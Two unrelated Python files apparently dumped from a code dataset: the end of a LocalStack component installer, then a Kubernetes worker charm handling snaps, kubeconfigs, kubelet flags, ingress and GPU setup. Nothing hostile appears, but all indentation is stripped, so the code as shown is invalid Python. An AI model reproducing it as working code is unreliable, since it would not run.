kms_url = KMS_URL_PATTERN.replace("<arch>", local_arch)
download(kms_url, binary_path)
chmod_r(binary_path, 0o777)
def install_stepfunctions_local():
if not os.path.exists(INSTALL_PATH_STEPFUNCTIONS_JAR):
# pull the JAR file from the Docker image, which is more up-to-date than the downloadable JAR file
log_install_msg("Step Functions")
mkdir(INSTALL_DIR_STEPFUNCTIONS)
run("{dc} pull {img}".format(dc=config.DOCKER_CMD, img=IMAGE_NAME_SFN_LOCAL))
docker_name = "tmp-ls-sfn"
run(
("{dc} run --name={dn} --entrypoint= -d --rm {img} sleep 15").format(
dc=config.DOCKER_CMD, dn=docker_name, img=IMAGE_NAME_SFN_LOCAL
)
)
time.sleep(5)
run(
"{dc} cp {dn}:/home/stepfunctionslocal/ {tgt}".format(
dc=config.DOCKER_CMD, dn=docker_name, tgt=INSTALL_DIR_INFRA
)
)
run("mv %s/stepfunctionslocal/*.jar %s" % (INSTALL_DIR_INFRA, INSTALL_DIR_STEPFUNCTIONS))
rm_rf("%s/stepfunctionslocal" % INSTALL_DIR_INFRA)
# apply patches
patch_class_file = os.path.join(INSTALL_DIR_STEPFUNCTIONS, SFN_PATCH_CLASS)
if not os.path.exists(patch_class_file):
download(SFN_PATCH_CLASS_URL, patch_class_file)
cmd = 'cd "%s"; zip %s %s' % (
INSTALL_DIR_STEPFUNCTIONS,
INSTALL_PATH_STEPFUNCTIONS_JAR,
SFN_PATCH_CLASS,
)
run(cmd)
def install_dynamodb_local():
if OVERWRITE_DDB_FILES_IN_DOCKER and in_docker():
rm_rf(INSTALL_DIR_DDB)
is_in_alpine = is_alpine()
if not os.path.exists(INSTALL_PATH_DDB_JAR):
log_install_msg("DynamoDB")
# download and extract archive
tmp_archive = os.path.join(tempfile.gettempdir(), "localstack.ddb.zip")
dynamodb_url = DYNAMODB_JAR_URL_ALPINE if is_in_alpine else DYNAMODB_JAR_URL
download_and_extract_with_retry(dynamodb_url, tmp_archive, INSTALL_DIR_DDB)
# fix logging configuration for DynamoDBLocal
log4j2_config = """<Configuration status="WARN">
<Appenders>
<Console name="Console" target="SYSTEM_OUT">
<PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
</Console>
</Appenders>
<Loggers>
<Root level="WARN"><AppenderRef ref="Console"/></Root>
</Loggers>
</Configuration>"""
log4j2_file = os.path.join(INSTALL_DIR_DDB, "log4j2.xml")
save_file(log4j2_file, log4j2_config)
run('cd "%s" && zip -u DynamoDBLocal.jar log4j2.xml || true' % INSTALL_DIR_DDB)
def install_amazon_kinesis_client_libs():
# install KCL/STS JAR files
if not os.path.exists(INSTALL_PATH_KCL_JAR):
mkdir(INSTALL_DIR_KCL)
tmp_archive = os.path.join(tempfile.gettempdir(), "aws-java-sdk-sts.jar")
if not os.path.exists(tmp_archive):
download(STS_JAR_URL, tmp_archive)
shutil.copy(tmp_archive, INSTALL_DIR_KCL)
# Compile Java files
from localstack.utils.kinesis import kclipy_helper
classpath = kclipy_helper.get_kcl_classpath()
if is_windows():
classpath = re.sub(r":([^\\])", r";\1", classpath)
java_files = "%s/utils/kinesis/java/cloud/localstack/*.java" % MODULE_MAIN_PATH
class_files = "%s/utils/kinesis/java/cloud/localstack/*.class" % MODULE_MAIN_PATH
if not glob.glob(class_files):
run(
'javac -source %s -target %s -cp "%s" %s'
% (JAVAC_TARGET_VERSION, JAVAC_TARGET_VERSION, classpath, java_files)
)
def install_lambda_java_libs():
# install LocalStack "fat" JAR file (contains all dependencies)
if not os.path.exists(INSTALL_PATH_LOCALSTACK_FAT_JAR):
log_install_msg("LocalStack Java libraries", verbatim=True)
download(URL_LOCALSTACK_FAT_JAR, INSTALL_PATH_LOCALSTACK_FAT_JAR)
def install_cloudformation_libs():
from localstack.services.cloudformation import deployment_utils
# trigger download of CF module file
deployment_utils.get_cfn_response_mod_file()
def install_component(name):
installers = {
"cloudformation": install_cloudformation_libs,
"dynamodb": install_dynamodb_local,
"kinesis": install_kinesis,
"kms": install_local_kms,
"sqs": install_elasticmq,
"stepfunctions": install_stepfunctions_local,
}
installer = installers.get(name)
if installer:
installer()
def install_components(names):
parallelize(install_component, names)
install_lambda_java_libs()
def install_all_components():
# load plugins
os.environ[LOCALSTACK_INFRA_PROCESS] = "1"
bootstrap.load_plugins()
# install all components
install_components(DEFAULT_SERVICE_PORTS.keys())
def install_debugpy_and_dependencies():
try:
import debugpy
assert debugpy
logging.debug("Debugpy module already Installed")
except ModuleNotFoundError:
logging.debug("Installing Debugpy module")
import pip
if hasattr(pip, "main"):
pip.main(["install", DEBUGPY_MODULE])
else:
pip._internal.main(["install", DEBUGPY_MODULE])
# -----------------
# HELPER FUNCTIONS
# -----------------
def log_install_msg(component, verbatim=False):
component = component if verbatim else "local %s server" % component
LOG.info("Downloading and installing %s. This may take some time." % component)
def download_and_extract(archive_url, target_dir, retries=0, sleep=3, tmp_archive=None):
mkdir(target_dir)
tmp_archive = tmp_archive or new_tmp_file()
if not os.path.exists(tmp_archive):
# create temporary placeholder file, to avoid duplicate parallel downloads
save_file(tmp_archive, "")
for i in range(retries + 1):
try:
download(archive_url, tmp_archive)
break
except Exception:
time.sleep(sleep)
_, ext = os.path.splitext(tmp_archive)
if ext == ".zip":
unzip(tmp_archive, target_dir)
elif ext == ".gz" or ext == ".bz2":
untar(tmp_archive, target_dir)
else:
raise Exception("Unsupported archive format: %s" % ext)
def download_and_extract_with_retry(archive_url, tmp_archive, target_dir):
try:
download_and_extract(archive_url, target_dir, tmp_archive=tmp_archive)
except Exception as e:
# try deleting and re-downloading the zip file
LOG.info("Unable to extract file, re-downloading ZIP archive %s: %s" % (tmp_archive, e))
rm_rf(tmp_archive)
download_and_extract(archive_url, target_dir, tmp_archive=tmp_archive)
def main():
if len(sys.argv) > 1:
os.environ["LOCALSTACK_API_KEY"] = os.environ.get("LOCALSTACK_API_KEY") or "test"
if sys.argv[1] == "libs":
print("Initializing installation.")
logging.basicConfig(level=logging.INFO)
logging.getLogger("requests").setLevel(logging.WARNING)
install_all_components()
if sys.argv[1] in ("libs", "testlibs"):
# Install additional libraries for testing
install_amazon_kinesis_client_libs()
print("Done.")
if __name__ == "__main__":
main()
|
the-stack_0_12324 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import random
import shutil
import subprocess
import time
from shlex import split
from subprocess import check_call, check_output
from subprocess import CalledProcessError
from socket import gethostname
from charms import layer
from charms.layer import snap
from charms.reactive import hook
from charms.reactive import set_state, remove_state, is_state
from charms.reactive import when, when_any, when_not
from charms.kubernetes.common import get_version
from charms.reactive.helpers import data_changed, any_file_changed
from charms.templating.jinja2 import render
from charmhelpers.core import hookenv, unitdata
from charmhelpers.core.host import service_stop, service_restart
from charmhelpers.contrib.charmsupport import nrpe
# Override the default nagios shortname regex to allow periods, which we
# need because our bin names contain them (e.g. 'snap.foo.daemon'). The
# default regex in charmhelpers doesn't allow periods, but nagios itself does.
nrpe.Check.shortname_re = '[\.A-Za-z0-9-_]+$'
kubeconfig_path = '/root/cdk/kubeconfig'
kubeproxyconfig_path = '/root/cdk/kubeproxyconfig'
kubeclientconfig_path = '/root/.kube/config'
os.environ['PATH'] += os.pathsep + os.path.join(os.sep, 'snap', 'bin')
db = unitdata.kv()
@hook('upgrade-charm')
def upgrade_charm():
# Trigger removal of PPA docker installation if it was previously set.
set_state('config.changed.install_from_upstream')
hookenv.atexit(remove_state, 'config.changed.install_from_upstream')
cleanup_pre_snap_services()
check_resources_for_upgrade_needed()
# Remove the RC for nginx ingress if it exists
if hookenv.config().get('ingress'):
kubectl_success('delete', 'rc', 'nginx-ingress-controller')
# Remove gpu.enabled state so we can reconfigure gpu-related kubelet flags,
# since they can differ between k8s versions
remove_state('kubernetes-worker.gpu.enabled')
remove_state('kubernetes-worker.cni-plugins.installed')
remove_state('kubernetes-worker.config.created')
remove_state('kubernetes-worker.ingress.available')
set_state('kubernetes-worker.restart-needed')
def check_resources_for_upgrade_needed():
hookenv.status_set('maintenance', 'Checking resources')
resources = ['kubectl', 'kubelet', 'kube-proxy']
paths = [hookenv.resource_get(resource) for resource in resources]
if any_file_changed(paths):
set_upgrade_needed()
def set_upgrade_needed():
set_state('kubernetes-worker.snaps.upgrade-needed')
config = hookenv.config()
previous_channel = config.previous('channel')
require_manual = config.get('require-manual-upgrade')
if previous_channel is None or not require_manual:
set_state('kubernetes-worker.snaps.upgrade-specified')
def cleanup_pre_snap_services():
# remove old states
remove_state('kubernetes-worker.components.installed')
# disable old services
services = ['kubelet', 'kube-proxy']
for service in services:
hookenv.log('Stopping {0} service.'.format(service))
service_stop(service)
# cleanup old files
files = [
"/lib/systemd/system/kubelet.service",
"/lib/systemd/system/kube-proxy.service",
"/etc/default/kube-default",
"/etc/default/kubelet",
"/etc/default/kube-proxy",
"/srv/kubernetes",
"/usr/local/bin/kubectl",
"/usr/local/bin/kubelet",
"/usr/local/bin/kube-proxy",
"/etc/kubernetes"
]
for file in files:
if os.path.isdir(file):
hookenv.log("Removing directory: " + file)
shutil.rmtree(file)
elif os.path.isfile(file):
hookenv.log("Removing file: " + file)
os.remove(file)
@when('config.changed.channel')
def channel_changed():
set_upgrade_needed()
@when('kubernetes-worker.snaps.upgrade-needed')
@when_not('kubernetes-worker.snaps.upgrade-specified')
def upgrade_needed_status():
msg = 'Needs manual upgrade, run the upgrade action'
hookenv.status_set('blocked', msg)
@when('kubernetes-worker.snaps.upgrade-specified')
def install_snaps():
check_resources_for_upgrade_needed()
channel = hookenv.config('channel')
hookenv.status_set('maintenance', 'Installing kubectl snap')
snap.install('kubectl', channel=channel, classic=True)
hookenv.status_set('maintenance', 'Installing kubelet snap')
snap.install('kubelet', channel=channel, classic=True)
hookenv.status_set('maintenance', 'Installing kube-proxy snap')
snap.install('kube-proxy', channel=channel, classic=True)
set_state('kubernetes-worker.snaps.installed')
set_state('kubernetes-worker.restart-needed')
remove_state('kubernetes-worker.snaps.upgrade-needed')
remove_state('kubernetes-worker.snaps.upgrade-specified')
@hook('stop')
def shutdown():
''' When this unit is destroyed:
- delete the current node
- stop the worker services
'''
try:
if os.path.isfile(kubeconfig_path):
kubectl('delete', 'node', gethostname().lower())
except CalledProcessError:
hookenv.log('Failed to unregister node.')
service_stop('snap.kubelet.daemon')
service_stop('snap.kube-proxy.daemon')
@when('docker.available')
@when_not('kubernetes-worker.cni-plugins.installed')
def install_cni_plugins():
''' Unpack the cni-plugins resource '''
charm_dir = os.getenv('CHARM_DIR')
# Get the resource via resource_get
try:
resource_name = 'cni-{}'.format(arch())
archive = hookenv.resource_get(resource_name)
except Exception:
message = 'Error fetching the cni resource.'
hookenv.log(message)
hookenv.status_set('blocked', message)
return
if not archive:
hookenv.log('Missing cni resource.')
hookenv.status_set('blocked', 'Missing cni resource.')
return
# Handle null resource publication, we check if filesize < 1mb
filesize = os.stat(archive).st_size
if filesize < 1000000:
hookenv.status_set('blocked', 'Incomplete cni resource.')
return
hookenv.status_set('maintenance', 'Unpacking cni resource.')
unpack_path = '{}/files/cni'.format(charm_dir)
os.makedirs(unpack_path, exist_ok=True)
cmd = ['tar', 'xfvz', archive, '-C', unpack_path]
hookenv.log(cmd)
check_call(cmd)
apps = [
{'name': 'loopback', 'path': '/opt/cni/bin'}
]
for app in apps:
unpacked = '{}/{}'.format(unpack_path, app['name'])
app_path = os.path.join(app['path'], app['name'])
install = ['install', '-v', '-D', unpacked, app_path]
hookenv.log(install)
check_call(install)
# Used by the "registry" action. The action is run on a single worker, but
# the registry pod can end up on any worker, so we need this directory on
# all the workers.
os.makedirs('/srv/registry', exist_ok=True)
set_state('kubernetes-worker.cni-plugins.installed')
@when('kubernetes-worker.snaps.installed')
def set_app_version():
''' Declare the application version to juju '''
cmd = ['kubelet', '--version']
version = check_output(cmd)
hookenv.application_version_set(version.split(b' v')[-1].rstrip())
@when('kubernetes-worker.snaps.installed')
@when_not('kube-control.dns.available')
def notify_user_transient_status():
''' Notify the user that we are in a transient state and the application
is still converging. Potentially remotely, or we may be in a detached loop
wait state '''
# During deployment the worker has to start kubelet without cluster dns
# configured. If this is the first unit online in a service pool waiting
# to self host the dns pod, and configure itself to query the dns service
# declared in the kube-system namespace
hookenv.status_set('waiting', 'Waiting for cluster DNS.')
@when('kubernetes-worker.snaps.installed',
'kube-control.dns.available')
@when_not('kubernetes-worker.snaps.upgrade-needed')
def charm_status(kube_control):
'''Update the status message with the current status of kubelet.'''
update_kubelet_status()
def update_kubelet_status():
''' There are different states that the kubelet can be in, where we are
waiting for dns, waiting for cluster turnup, or ready to serve
applications.'''
services = [
'kubelet',
'kube-proxy'
]
failing_services = []
for service in services:
daemon = 'snap.{}.daemon'.format(service)
if not _systemctl_is_active(daemon):
failing_services.append(service)
if len(failing_services) == 0:
hookenv.status_set('active', 'Kubernetes worker running.')
else:
msg = 'Waiting for {} to start.'.format(','.join(failing_services))
hookenv.status_set('waiting', msg)
def get_ingress_address(relation):
try:
network_info = hookenv.network_get(relation.relation_name)
except NotImplementedError:
network_info = []
if network_info and 'ingress-addresses' in network_info:
# just grab the first one for now, maybe be more robust here?
return network_info['ingress-addresses'][0]
else:
# if they don't have ingress-addresses they are running a juju that
# doesn't support spaces, so just return the private address
return hookenv.unit_get('private-address')
@when('certificates.available', 'kube-control.connected')
def send_data(tls, kube_control):
'''Send the data that is required to create a server certificate for
this server.'''
# Use the public ip of this unit as the Common Name for the certificate.
common_name = hookenv.unit_public_ip()
ingress_ip = get_ingress_address(kube_control)
# Create SANs that the tls layer will add to the server cert.
sans = [
hookenv.unit_public_ip(),
ingress_ip,
gethostname()
]
# Create a path safe name by removing path characters from the unit name.
certificate_name = hookenv.local_unit().replace('/', '_')
# Request a server cert with this information.
tls.request_server_cert(common_name, sans, certificate_name)
@when('kube-api-endpoint.available', 'kube-control.dns.available',
'cni.available')
def watch_for_changes(kube_api, kube_control, cni):
''' Watch for configuration changes and signal if we need to restart the
worker services '''
servers = get_kube_api_servers(kube_api)
dns = kube_control.get_dns()
cluster_cidr = cni.get_config()['cidr']
if (data_changed('kube-api-servers', servers) or
data_changed('kube-dns', dns) or
data_changed('cluster-cidr', cluster_cidr)):
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.snaps.installed', 'kube-api-endpoint.available',
'tls_client.ca.saved', 'tls_client.client.certificate.saved',
'tls_client.client.key.saved', 'tls_client.server.certificate.saved',
'tls_client.server.key.saved',
'kube-control.dns.available', 'kube-control.auth.available',
'cni.available', 'kubernetes-worker.restart-needed',
'worker.auth.bootstrapped')
def start_worker(kube_api, kube_control, auth_control, cni):
''' Start kubelet using the provided API and DNS info.'''
servers = get_kube_api_servers(kube_api)
# Note that the DNS server doesn't necessarily exist at this point. We know
# what its IP will eventually be, though, so we can go ahead and configure
# kubelet with that info. This ensures that early pods are configured with
# the correct DNS even though the server isn't ready yet.
dns = kube_control.get_dns()
ingress_ip = get_ingress_address(kube_control)
cluster_cidr = cni.get_config()['cidr']
if cluster_cidr is None:
hookenv.log('Waiting for cluster cidr.')
return
creds = db.get('credentials')
data_changed('kube-control.creds', creds)
# set --allow-privileged flag for kubelet
set_privileged()
create_config(random.choice(servers), creds)
configure_kubelet(dns, ingress_ip)
configure_kube_proxy(servers, cluster_cidr)
set_state('kubernetes-worker.config.created')
restart_unit_services()
update_kubelet_status()
apply_node_labels()
remove_state('kubernetes-worker.restart-needed')
@when('cni.connected')
@when_not('cni.configured')
def configure_cni(cni):
''' Set worker configuration on the CNI relation. This lets the CNI
subordinate know that we're the worker so it can respond accordingly. '''
cni.set_config(is_master=False, kubeconfig_path=kubeconfig_path)
@when('config.changed.ingress')
def toggle_ingress_state():
''' Ingress is a toggled state. Remove ingress.available if set when
toggled '''
remove_state('kubernetes-worker.ingress.available')
@when('docker.sdn.configured')
def sdn_changed():
'''The Software Defined Network changed on the container so restart the
kubernetes services.'''
restart_unit_services()
update_kubelet_status()
remove_state('docker.sdn.configured')
@when('kubernetes-worker.config.created')
@when_not('kubernetes-worker.ingress.available')
def render_and_launch_ingress():
''' If configuration has ingress daemon set enabled, launch the ingress load
balancer and default http backend. Otherwise attempt deletion. '''
config = hookenv.config()
# If ingress is enabled, launch the ingress controller
if config.get('ingress'):
launch_default_ingress_controller()
else:
hookenv.log('Deleting the http backend and ingress.')
kubectl_manifest('delete',
'/root/cdk/addons/default-http-backend.yaml')
kubectl_manifest('delete',
'/root/cdk/addons/ingress-daemon-set.yaml') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
@when('config.changed.labels', 'kubernetes-worker.config.created')
def apply_node_labels():
''' Parse the labels configuration option and apply the labels to the node.
'''
# scrub and try to format an array from the configuration option
config = hookenv.config()
user_labels = _parse_labels(config.get('labels'))
# For diffing sake, iterate the previous label set
if config.previous('labels'):
previous_labels = _parse_labels(config.previous('labels'))
hookenv.log('previous labels: {}'.format(previous_labels))
else:
# this handles first time run if there is no previous labels config
previous_labels = _parse_labels("")
# Calculate label removal
for label in previous_labels:
if label not in user_labels:
hookenv.log('Deleting node label {}'.format(label))
_apply_node_label(label, delete=True)
# if the label is in user labels we do nothing here, it will get set
# during the atomic update below.
# Atomically set a label
for label in user_labels:
_apply_node_label(label, overwrite=True)
# Set label for application name
_apply_node_label('juju-application={}'.format(hookenv.service_name()),
overwrite=True)
@when_any('config.changed.kubelet-extra-args',
'config.changed.proxy-extra-args')
def extra_args_changed():
set_state('kubernetes-worker.restart-needed')
@when('config.changed.docker-logins')
def docker_logins_changed():
config = hookenv.config()
previous_logins = config.previous('docker-logins')
logins = config['docker-logins']
logins = json.loads(logins)
if previous_logins:
previous_logins = json.loads(previous_logins)
next_servers = {login['server'] for login in logins}
previous_servers = {login['server'] for login in previous_logins}
servers_to_logout = previous_servers - next_servers
for server in servers_to_logout:
cmd = ['docker', 'logout', server]
subprocess.check_call(cmd)
for login in logins:
server = login['server']
username = login['username']
password = login['password']
cmd = ['docker', 'login', server, '-u', username, '-p', password]
subprocess.check_call(cmd)
set_state('kubernetes-worker.restart-needed')
def arch():
'''Return the package architecture as a string. Raise an exception if the
architecture is not supported by kubernetes.'''
# Get the package architecture for this system.
architecture = check_output(['dpkg', '--print-architecture']).rstrip()
# Convert the binary result into a string.
architecture = architecture.decode('utf-8')
return architecture
def create_config(server, creds):
'''Create a kubernetes configuration for the worker unit.'''
# Get the options from the tls-client layer.
layer_options = layer.options('tls-client')
# Get all the paths to the tls information required for kubeconfig.
ca = layer_options.get('ca_certificate_path')
# Create kubernetes configuration in the default location for ubuntu.
create_kubeconfig('/home/ubuntu/.kube/config', server, ca,
token=creds['client_token'], user='ubuntu')
# Make the config dir readable by the ubuntu users so juju scp works.
cmd = ['chown', '-R', 'ubuntu:ubuntu', '/home/ubuntu/.kube']
check_call(cmd)
# Create kubernetes configuration in the default location for root.
create_kubeconfig(kubeclientconfig_path, server, ca,
token=creds['client_token'], user='root')
# Create kubernetes configuration for kubelet, and kube-proxy services.
create_kubeconfig(kubeconfig_path, server, ca,
token=creds['kubelet_token'], user='kubelet')
create_kubeconfig(kubeproxyconfig_path, server, ca,
token=creds['proxy_token'], user='kube-proxy')
def parse_extra_args(config_key):
elements = hookenv.config().get(config_key, '').split()
args = {}
for element in elements:
if '=' in element:
key, _, value = element.partition('=')
args[key] = value
else:
args[element] = 'true'
return args
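# For illustration (hypothetical config value): with kubelet-extra-args set to
# "v=4 feature-gates=PodPriority=true standalone-mode", parse_extra_args returns
# {'v': '4', 'feature-gates': 'PodPriority=true', 'standalone-mode': 'true'}.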
def configure_kubernetes_service(service, base_args, extra_args_key):
db = unitdata.kv()
prev_args_key = 'kubernetes-worker.prev_args.' + service
prev_args = db.get(prev_args_key) or {}
extra_args = parse_extra_args(extra_args_key)
args = {}
for arg in prev_args:
# remove previous args by setting to null
args[arg] = 'null'
for k, v in base_args.items():
args[k] = v
for k, v in extra_args.items():
args[k] = v
cmd = ['snap', 'set', service] + ['%s=%s' % item for item in args.items()]
check_call(cmd)
db.set(prev_args_key, args)
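# Illustrative effect (values abbreviated): for the kubelet service this ends up
# running something like `snap set kubelet kubeconfig=/root/cdk/kubeconfig v=0 ...`,
# while args set on a previous run but dropped since are cleared by passing key=null.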
def configure_kubelet(dns, ingress_ip):
layer_options = layer.options('tls-client')
ca_cert_path = layer_options.get('ca_certificate_path')
server_cert_path = layer_options.get('server_certificate_path')
server_key_path = layer_options.get('server_key_path')
kubelet_opts = {}
kubelet_opts['require-kubeconfig'] = 'true'
kubelet_opts['kubeconfig'] = kubeconfig_path
kubelet_opts['network-plugin'] = 'cni'
kubelet_opts['v'] = '0'
kubelet_opts['address'] = '0.0.0.0'
kubelet_opts['port'] = '10250'
kubelet_opts['cluster-domain'] = dns['domain']
kubelet_opts['anonymous-auth'] = 'false'
kubelet_opts['client-ca-file'] = ca_cert_path
kubelet_opts['tls-cert-file'] = server_cert_path
kubelet_opts['tls-private-key-file'] = server_key_path
kubelet_opts['logtostderr'] = 'true'
kubelet_opts['fail-swap-on'] = 'false'
kubelet_opts['node-ip'] = ingress_ip
if (dns['enable-kube-dns']):
kubelet_opts['cluster-dns'] = dns['sdn-ip']
privileged = is_state('kubernetes-worker.privileged')
kubelet_opts['allow-privileged'] = 'true' if privileged else 'false'
if is_state('kubernetes-worker.gpu.enabled'):
if get_version('kubelet') < (1, 6):
hookenv.log('Adding --experimental-nvidia-gpus=1 to kubelet')
kubelet_opts['experimental-nvidia-gpus'] = '1'
else:
hookenv.log('Adding --feature-gates=Accelerators=true to kubelet')
kubelet_opts['feature-gates'] = 'Accelerators=true'
configure_kubernetes_service('kubelet', kubelet_opts, 'kubelet-extra-args')
def configure_kube_proxy(api_servers, cluster_cidr):
kube_proxy_opts = {}
kube_proxy_opts['cluster-cidr'] = cluster_cidr
kube_proxy_opts['kubeconfig'] = kubeproxyconfig_path
kube_proxy_opts['logtostderr'] = 'true'
kube_proxy_opts['v'] = '0'
kube_proxy_opts['master'] = random.choice(api_servers)
if b'lxc' in check_output('virt-what', shell=True):
kube_proxy_opts['conntrack-max-per-core'] = '0'
configure_kubernetes_service('kube-proxy', kube_proxy_opts,
'proxy-extra-args')
def create_kubeconfig(kubeconfig, server, ca, key=None, certificate=None,
user='ubuntu', context='juju-context',
cluster='juju-cluster', password=None, token=None):
'''Create a configuration for Kubernetes based on path using the supplied
arguments for values of the Kubernetes server, CA, key, certificate, user
context and cluster.'''
if not key and not certificate and not password and not token:
raise ValueError('Missing authentication mechanism.')
# token and password are mutually exclusive. Error early if both are
# present. The developer has requested an impossible situation.
# see: kubectl config set-credentials --help
if token and password:
raise ValueError('Token and Password are mutually exclusive.')
# Create the config file with the address of the master server.
cmd = 'kubectl config --kubeconfig={0} set-cluster {1} ' \
'--server={2} --certificate-authority={3} --embed-certs=true'
check_call(split(cmd.format(kubeconfig, cluster, server, ca)))
# Delete old users
cmd = 'kubectl config --kubeconfig={0} unset users'
check_call(split(cmd.format(kubeconfig)))
# Create the credentials using the client flags.
cmd = 'kubectl config --kubeconfig={0} ' \
'set-credentials {1} '.format(kubeconfig, user)
if key and certificate:
cmd = '{0} --client-key={1} --client-certificate={2} '\
'--embed-certs=true'.format(cmd, key, certificate)
if password:
cmd = "{0} --username={1} --password={2}".format(cmd, user, password)
# This is mutually exclusive from password. They will not work together.
if token:
cmd = "{0} --token={1}".format(cmd, token)
check_call(split(cmd))
# Create a default context with the cluster.
cmd = 'kubectl config --kubeconfig={0} set-context {1} ' \
'--cluster={2} --user={3}'
check_call(split(cmd.format(kubeconfig, context, cluster, user)))
# Make the config use this new context.
cmd = 'kubectl config --kubeconfig={0} use-context {1}'
check_call(split(cmd.format(kubeconfig, context)))
@when_any('config.changed.default-backend-image',
'config.changed.nginx-image')
@when('kubernetes-worker.config.created')
def launch_default_ingress_controller():
''' Launch the Kubernetes ingress controller & default backend (404) '''
config = hookenv.config()
# need to test this in case we get in
# here from a config change to the image
if not config.get('ingress'):
return
context = {}
context['arch'] = arch()
addon_path = '/root/cdk/addons/{}'
context['defaultbackend_image'] = config.get('default-backend-image')
if (context['defaultbackend_image'] == "" or
context['defaultbackend_image'] == "auto"):
if context['arch'] == 's390x':
context['defaultbackend_image'] = \
"gcr.io/google_containers/defaultbackend-s390x:1.4"
else:
context['defaultbackend_image'] = \
"gcr.io/google_containers/defaultbackend:1.4"
# Render the default http backend (404) replicationcontroller manifest
manifest = addon_path.format('default-http-backend.yaml')
render('default-http-backend.yaml', manifest, context)
hookenv.log('Creating the default http backend.')
try:
kubectl('apply', '-f', manifest)
except CalledProcessError as e:
hookenv.log(e)
hookenv.log('Failed to create default-http-backend. Will attempt again next update.') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
return
# Render the ingress daemon set controller manifest
context['ingress_image'] = config.get('nginx-image')
if context['ingress_image'] == "" or context['ingress_image'] == "auto":
if context['arch'] == 's390x':
context['ingress_image'] = \
"docker.io/cdkbot/nginx-ingress-controller-s390x:0.9.0-beta.13"
else:
context['ingress_image'] = \
"gcr.io/google_containers/nginx-ingress-controller:0.9.0-beta.15" # noqa
context['juju_application'] = hookenv.service_name()
manifest = addon_path.format('ingress-daemon-set.yaml')
render('ingress-daemon-set.yaml', manifest, context)
hookenv.log('Creating the ingress daemon set.')
try:
kubectl('apply', '-f', manifest)
except CalledProcessError as e:
hookenv.log(e)
hookenv.log('Failed to create ingress controller. Will attempt again next update.') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
return
set_state('kubernetes-worker.ingress.available')
hookenv.open_port(80)
hookenv.open_port(443)
def restart_unit_services():
'''Restart worker services.'''
hookenv.log('Restarting kubelet and kube-proxy.')
services = ['kube-proxy', 'kubelet']
for service in services:
service_restart('snap.%s.daemon' % service)
def get_kube_api_servers(kube_api):
'''Return the kubernetes api server address and port for this
relationship.'''
hosts = []
# Iterate over every service from the relation object.
for service in kube_api.services():
for unit in service['hosts']:
hosts.append('https://{0}:{1}'.format(unit['hostname'],
unit['port']))
return hosts
def kubectl(*args):
''' Run a kubectl cli command with a config file. Returns stdout and throws
an error if the command fails. '''
command = ['kubectl', '--kubeconfig=' + kubeclientconfig_path] + list(args)
hookenv.log('Executing {}'.format(command))
return check_output(command)
def kubectl_success(*args):
''' Runs kubectl with the given args. Returns True if successful, False if
not. '''
try:
kubectl(*args)
return True
except CalledProcessError:
return False
def kubectl_manifest(operation, manifest):
''' Wrap the kubectl creation command when using filepath resources
:param operation - one of get, create, delete, replace
:param manifest - filepath to the manifest
'''
# Deletions are a special case
if operation == 'delete':
# Ensure we immediately remove requested resources with --now
return kubectl_success(operation, '-f', manifest, '--now')
else:
# Guard against an error re-creating the same manifest multiple times
if operation == 'create':
# If we already have the definition, it's probably safe to assume
# creation was true.
if kubectl_success('get', '-f', manifest):
hookenv.log('Skipping definition for {}'.format(manifest))
return True
# Execute the requested command that did not match any of the special
# cases above
return kubectl_success(operation, '-f', manifest)
@when('nrpe-external-master.available')
@when_not('nrpe-external-master.initial-config')
def initial_nrpe_config(nagios=None):
set_state('nrpe-external-master.initial-config')
update_nrpe_config(nagios)
@when('kubernetes-worker.config.created')
@when('nrpe-external-master.available')
@when_any('config.changed.nagios_context',
'config.changed.nagios_servicegroups')
def update_nrpe_config(unused=None):
services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon')
hostname = nrpe.get_nagios_hostname()
current_unit = nrpe.get_nagios_unit_name()
nrpe_setup = nrpe.NRPE(hostname=hostname)
nrpe.add_init_service_checks(nrpe_setup, services, current_unit)
nrpe_setup.write()
@when_not('nrpe-external-master.available')
@when('nrpe-external-master.initial-config')
def remove_nrpe_config(nagios=None):
remove_state('nrpe-external-master.initial-config')
# List of systemd services for which the checks will be removed
services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon')
# The current nrpe-external-master interface doesn't handle a lot of logic,
# use the charm-helpers code for now.
hostname = nrpe.get_nagios_hostname()
nrpe_setup = nrpe.NRPE(hostname=hostname)
for service in services:
nrpe_setup.remove_check(shortname=service)
def set_privileged():
"""Update the allow-privileged flag for kubelet.
"""
privileged = hookenv.config('allow-privileged')
if privileged == 'auto':
gpu_enabled = is_state('kubernetes-worker.gpu.enabled')
privileged = 'true' if gpu_enabled else 'false'
if privileged == 'true':
set_state('kubernetes-worker.privileged')
else:
remove_state('kubernetes-worker.privileged')
@when('config.changed.allow-privileged')
@when('kubernetes-worker.config.created')
def on_config_allow_privileged_change():
"""React to changed 'allow-privileged' config value.
"""
set_state('kubernetes-worker.restart-needed')
remove_state('config.changed.allow-privileged')
@when('cuda.installed')
@when('kubernetes-worker.config.created')
@when_not('kubernetes-worker.gpu.enabled')
def enable_gpu():
"""Enable GPU usage on this node.
"""
config = hookenv.config()
if config['allow-privileged'] == "false":
hookenv.status_set(
'active',
'GPUs available. Set allow-privileged="auto" to enable.'
)
return
hookenv.log('Enabling gpu mode')
try:
# Not sure why this is necessary, but if you don't run this, k8s will
# think that the node has 0 gpus (as shown by the output of
# `kubectl get nodes -o yaml`)
check_call(['nvidia-smi'])
except CalledProcessError as cpe:
hookenv.log('Unable to communicate with the NVIDIA driver.')
hookenv.log(cpe)
return
# Apply node labels
_apply_node_label('gpu=true', overwrite=True)
_apply_node_label('cuda=true', overwrite=True)
set_state('kubernetes-worker.gpu.enabled')
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.gpu.enabled')
@when_not('kubernetes-worker.privileged')
